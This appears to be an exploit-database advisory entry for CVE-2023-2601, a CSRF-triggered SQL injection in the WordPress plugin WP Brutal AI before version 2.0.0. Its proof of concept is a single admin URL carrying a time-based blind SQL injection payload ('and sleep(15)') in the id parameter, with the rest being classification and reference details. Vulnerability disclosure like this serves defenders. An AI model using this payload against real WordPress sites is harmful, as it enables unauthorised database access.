Share
## https://sploitus.com/exploit?id=PACKETSTORM:173732
Tittle:  
WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRF  
  
References:  
CVE-2023-2601  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.  
  
Affects Plugins:  
WP Brutal AI - Fixed in version 2.0.0  
  
Proof of Concept:  
  
When there is a created campaign, access the following link as an admin:  
  
https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29   
  
Classification:  
Type SQLi   
OWASP top 10 A1: Sql Injection (SQLi)  
CWE-89  
  
wpScan:  
https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd